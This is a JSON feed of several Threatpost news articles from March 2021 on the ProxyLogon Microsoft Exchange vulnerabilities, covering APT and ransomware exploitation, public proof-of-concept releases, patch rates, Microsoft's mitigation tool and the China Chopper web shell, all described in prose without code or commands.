APT Attack Tsunami", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-11T18:01:16", "id": "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "href": "https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T14:17:03", "description": "Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.\n\nThe ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials.\n\nThe flaws give attackers the opportunity to install a webshell for further exploitation within the environment \u2014 and now, researchers say attackers are downloading the new ransomware strain (a.k.a. Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,\u201d Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.\n\n## **DearCry Ransomware**\n\nDearCry first came onto the infosec space\u2019s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a \u201csudden swarm\u201d of submissions to his ransomware identification website, ID-Ransomware.\n\nThe ransomware uses the extension \u201c.CRYPT\u201d when encrypting files, as well as a filemarker \u201cDEARCRY!\u201d in the string for each encrypted file.\n\n[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nhttps://twitter.com/demonslay335/status/1370125343571509250\n\nAccording to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called \u2018readme.txt\u2019) after initially infecting the victim \u2013 which contains two email addresses for the threat actors and demands a ransom payment of $16,000.\n\nMeanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. On Twitter, MalwareHunterTeam said the ransomware is \u201cnot that very widespread (yet?).\u201d Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here)](<https://twitter.com/malwrhunterteam/status/1370271414855593986>).\n\n## **Microsoft Exchange Attacks Doubling Every Hour**\n\nExploitation activity for the recently patched Exchange flaws continue to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.\n\n[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said in the past 24 hours alone, the number of exploitation attempts on organizations have doubled every two to three hours.\n\nResearchers said they saw hundreds of exploit attempts against organizations worldwide \u2013 with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).\n\nResearchers warned that exploitation activity will continue \u2014 and urged companies that have not already done so to patch.\n\n\u201cSince the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,\u201d according to Check Point researchers. \u201cGlobal experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-12T16:26:07", "type": "threatpost", "title": "Microsoft Exchange Exploits Pave a Ransomware Path", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-12T16:26:07", "id": "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "href": "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched following bugs this week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. \u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. \u201cSome of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.\u201d\n\n## **Who is the Hafnium APT?**\n\nHafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.\n\nIn terms of its tactics, \u201cHafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,\u201d according to Microsoft. \u201cOnce they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.\u201d\n\nHafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as \u201ca highly skilled and sophisticated actor.\u201d\n\n## **Time to Patch: Expect More Attacks Soon**\n\nIt should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.\n\n\u201cWe expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,\u201d he added.\n\nAnd indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.\n\nThey\u2019re not alone.\n\n\u201cFireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,\u201d Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. \u201cIn addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.\u201d\n", "cvss3": {}, "published": "2021-03-03T15:30:52", "type": "threatpost", "title": "Microsoft Exchange 0-Day Attackers Spy on U.S. Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T15:30:52", "id": "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "href": "https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n\n\nClick to enlarge. Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. \u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. \u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. potential litigation because sensitive data was stolen from the network.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dorman of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium first flagged by Hafnium is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. \u201cAll this is made available just from the one line of code running on the server.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 